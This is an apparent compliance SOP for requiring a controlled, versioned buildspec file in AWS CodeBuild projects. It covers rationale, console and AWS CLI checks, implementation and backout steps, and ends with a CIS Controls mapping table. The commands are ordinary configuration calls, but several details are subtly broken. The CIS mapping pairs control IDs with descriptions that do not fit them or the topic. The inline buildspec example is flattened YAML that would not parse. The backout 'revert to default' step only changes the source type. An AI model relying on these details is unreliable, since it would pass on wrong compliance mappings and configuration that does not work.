Profile Applicability:

  • Level 1

Description:

In AWS CodeBuild, the buildspec file defines the build commands and settings for the project. This file is critical for the consistency and security of build processes. Using an uncontrolled or custom buildspec file can result in unauthorized actions or unintended consequences during the build process. This SOP ensures that all CodeBuild projects use a controlled buildspec file that is versioned, stored in a secure repository, and follows security best practices.

Rationale:

  • Security: A controlled buildspec ensures that only authorized and intended build commands are executed, reducing the risk of unintended commands or insecure actions being executed during the build process.

  • Consistency: Ensures that the same build process is followed across different environments (e.g., development, staging, production).

  • Auditability: A controlled and versioned buildspec provides an auditable record of the build process, which is essential for debugging, compliance, and tracking changes over time.

  • Governance: Ensures that all teams adhere to the same build process, which helps maintain operational standards.

Impact:

Pros:

  • Enhanced Security: Mitigates the risk of executing malicious or insecure build commands.

  • Consistency: Ensures that the same build process is followed consistently across projects.

  • Audit Trail: Provides a clear history of changes to the buildspec file, which is valuable for troubleshooting and compliance.

Cons:

  • Management Overhead: Requires additional effort to ensure that the buildspec file is controlled, versioned, and stored securely.

  • Limited Flexibility: Some flexibility might be lost as developers may need to adhere to predefined build specifications.

Default Value:

By default, CodeBuild projects can use any buildspec file, including an inline buildspec or one stored within the source repository. To ensure compliance, the buildspec must be controlled by organization policies.

Pre-requisite:

  • AWS IAM Permissions:

    • codebuild:CreateProject

    • codebuild:UpdateProject

    • codebuild:BatchGetProjects

  • AWS CLI installed and configured.

  • Ensure that the CodeBuild project is using an approved buildspec file that is either stored within the source code repository or defined in a secure location.

  • Ensure the source repository is secured and controlled (e.g., using GitHub, AWS CodeCommit, or another version-controlled system).

Test Plan:

Using AWS Console:

  1. Sign in to the AWS Management Console.

  2. Navigate to AWS CodeBuild under Services.

  3. In the CodeBuild Dashboard, select Projects.

  4. Choose the CodeBuild project to check.

  5. Under the Buildspec section, ensure that the buildspec is defined as one of the following:

    • A reference to a buildspec file located in the source code repository (e.g., buildspec.yml).

    • An inline buildspec defined explicitly in the CodeBuild project configuration.

  6. Verify that the referenced or inline buildspec file follows the organizational policy, is controlled, and is versioned.

Using AWS CLI:

  1. To check which buildspec is being used by a CodeBuild project, run the following command:

    aws codebuild batch-get-projects --names <project-name> --query 'projects[0].buildspec'

  2. Review the output:

  • If the output contains an inline buildspec, check if the contents align with organizational security standards.

  • If the buildspec references a file in the repository, ensure that the referenced file is controlled and versioned appropriately.

Implementation Steps:

Using AWS Console:

  1. Log in to the AWS Management Console and navigate to AWS CodeBuild.

  2. In the CodeBuild Dashboard, select Projects and choose the CodeBuild project for which you want to configure a controlled buildspec.

  3. Click Edit.

  4. Under the Buildspec section:

    • Option 1: If using a file from the source repository, ensure the buildspec file is stored in a version-controlled repository, and the project configuration refers to it.

    • Option 2: If using an inline buildspec, ensure that the inline commands follow security best practices and organizational guidelines.

  5. Save the configuration by clicking Update Project.

Using AWS CLI:

  1. To associate a controlled buildspec file stored in a repository, run the following command:

    aws codebuild update-project --name <project-name> --source "type=CODECOMMIT,location=<repository-url>" --buildspec "buildspec.yml"

  2. To configure an inline buildspec:

    aws codebuild update-project --name <project-name> --buildspec 'version: 0.2 phases: install: commands: echo Hello World'

Backout Plan:

Using AWS Console:

  1. If using a controlled buildspec.yml causes issues, sign in to the AWS Management Console.

  2. Navigate to AWS CodeBuild, select the project, and go to the Source section.

  3. Remove or modify the buildspec.yml configuration to use an alternative location or the default configuration.

  4. Save the changes and monitor the build process to ensure it functions as expected.

Using AWS CLI:

  1. To revert to the default buildspec.yml configuration, run:

    aws codebuild update-project --name <PROJECT_NAME> --source "type=GITHUB,location=<REPO_URL>"

  2. Verify that the buildspec.yml file is now sourced from the default location:

    aws codebuild batch-get-projects --names <PROJECT_NAME>

References:

CIS Controls Mapping:

Version

Control ID

Control Description

IG1

IG2

IG3

v8

3.4

Encrypt Data on End-User Devices – Ensure data encryption during file system access.

v8

6.7

Implement Application Layer Filtering and Content Control – Ensure appropriate content filtering is applied to sensitive files.

v8

6.8

Define and Maintain Role-Based Access Control – Implement and manage role-based access for file systems.

v8

14.6

Protect Information Through Access Control Lists – Apply strict access control to file systems.